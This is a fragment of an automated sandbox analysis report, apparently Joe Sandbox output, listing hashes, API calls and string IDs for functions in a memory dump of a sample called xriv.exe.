                                                                        • Instruction ID: 1dd6de0cd1c6fc1b144c54823d0cc0717a4378f646d9378adf2a9419d28aba03
                                                                        • Opcode Fuzzy Hash: 849d287790c77d23fb8f8e6afdfb98757128ae9aa48655b9eea1e64dd1001344
                                                                        • Instruction Fuzzy Hash: 9CC14AB16203489BDB25DF38CD8579C7FB5AFA6314F54429CE904973C6C7358B848B92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        • Opcode ID: 3c524fe2804248ff4dd3d7f292854a3ff79e3188f511db76e58cce8fd7a30fac
                                                                        • Instruction ID: bd2d57e6ef892d273fdb7bd9d22d8ff842b81ce39bab89ac1e5c403378400d8b
                                                                        • Opcode Fuzzy Hash: 3c524fe2804248ff4dd3d7f292854a3ff79e3188f511db76e58cce8fd7a30fac
                                                                        • Instruction Fuzzy Hash: AD41BB75E6021AAFDB21DF9DD8849AEBBF8EFAA310F100056F604D7204D6B14A50CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01218FA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 2118026453-2084237596
                                                                        • Opcode ID: 851ae3e9c570af5c9baea1d48a4ba6e8f6c8c0f9b1d37e2c3326f038859525fd
                                                                        • Instruction ID: 64e926f3baf4adbb6d2149ddc54c9b2f8af1cace93a1dc7b92f10ef007b8179b
                                                                        • Opcode Fuzzy Hash: 851ae3e9c570af5c9baea1d48a4ba6e8f6c8c0f9b1d37e2c3326f038859525fd
                                                                        • Instruction Fuzzy Hash: D6414C7291020AAFDF16DF98CC81AEEBBF5FF68304F194059FA08A7215D3359990DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01212093
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileModuleName
                                                                        • String ID: 5120$H
                                                                        • API String ID: 514040917-2391956277
                                                                        • Opcode ID: db8cd6a150de5f719789b4510e52280fd4e0811c950de64a7f4b4171afbd6630
                                                                        • Instruction ID: 453c1f61f7fa2765f3aff83276c4e54de9bc86dcbec6dab986dfdc9bbad9df9a
                                                                        • Opcode Fuzzy Hash: db8cd6a150de5f719789b4510e52280fd4e0811c950de64a7f4b4171afbd6630
                                                                        • Instruction Fuzzy Hash: B921ACB0910348ABDB24EF28C9467ED7FF5AB22304F5401CCD54967286D7754B488BA3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%